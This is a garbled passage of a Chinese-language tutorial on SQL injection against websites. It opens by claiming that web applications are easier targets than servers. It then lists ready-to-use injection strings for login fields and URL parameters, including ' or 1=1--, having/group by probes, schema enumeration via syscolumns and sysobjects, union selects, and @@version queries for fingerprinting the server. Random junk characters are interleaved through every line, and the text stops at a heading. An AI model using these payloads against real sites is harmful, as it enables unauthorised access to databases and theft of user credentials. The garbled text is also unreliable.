s; D3 `# A, P- u你攻击网站程序,(ASP,JSP,PHP,CGI..)比服务器或者在服务器上运行的操作系统好的多。4 t' ]( `0 @5 \) Z5 Q
$ @0 i! t. u; Y, c( C/ H
SQL注射是一种通过网页输入一个查询命令或者一条指令进行欺骗的方法,很多站点都是从用户的用户名,密码甚至email获取用户的参数。) |% @- U% W" s" g& D: I
0 a- f/ e0 L4 ~$ Y& Z: B
他们都使用SQL查询命令。; w& `* _+ W! M; s; I( u7 {% T0 Q6 m
% Z% A/ _+ J) @
: w0 N8 _0 [ u3 P/ ?8 E
. D% Z5 b6 m- X7 r3 U2. 首先你用简单的进行尝试。7 ?9 W( k- v F2 ]9 G B. ^6 K) a
! x* T/ q0 s% ?$ L' T9 s
- Login:' or 1=1-- 0 A1 C. a, z3 @/ J! E+ J- P- Pass:' or 1=1-- ' R: H, m( ^1 H- X$ y- http://website/index.asp?id=' or 1=1-- 4 z& Y6 ]$ b: T% P8 r7 N这些是简单的方法,其他如下:4 I, w2 [, K6 V4 a8 o
' r: n+ M# X# [) R) Z) [5 e5 P& t- ' having 1=1-- : F/ o. F% J* Z. }" b% M, Y4 T- ' group by userid having 1=1--+ X% v# z* E/ L2 e; u+ u
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--% t& i' ?. M9 M: E0 B* M
- ' union select sum(columnname) from tablename-- ) Q3 { z# e5 G6 G2 J% v , E4 Q) W9 o; g' @# ` 2 J. h# q* Y6 m: _4 A) T: F4 v- s9 x# n0 a# R/ M2 ` X" t" V, n
3.收集信息4 z+ d' n$ M* `: p2 u% c4 u
% f" B+ {6 X$ @3 n- [8 Z- ' or 1 in (select @@version)--' j7 V: F! d8 C( p3 s
- ' union all select @@version-- /*这个优秀 - X0 l4 }3 D* _& R1 ^这些能找到计算机,操作系统,补丁的真实版本。7 Y+ W V; j; f5 F6 G4 ~
! _- [) e; ~7 g& ]1 T3 L+ J
8 \3 n: R \, u/ Z1 a' r* \* R9 |2 G" |- z6 M C9 b
4.数据类型# T {: g u2 ]- l( M